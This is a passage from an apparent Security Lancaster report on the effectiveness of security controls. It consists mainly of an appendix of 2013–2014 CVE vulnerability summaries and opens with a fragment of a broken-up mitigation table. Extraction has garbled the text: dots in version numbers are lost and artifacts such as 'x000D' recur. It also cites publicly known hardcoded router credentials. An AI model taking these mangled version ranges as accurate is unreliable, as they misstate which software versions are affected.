ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
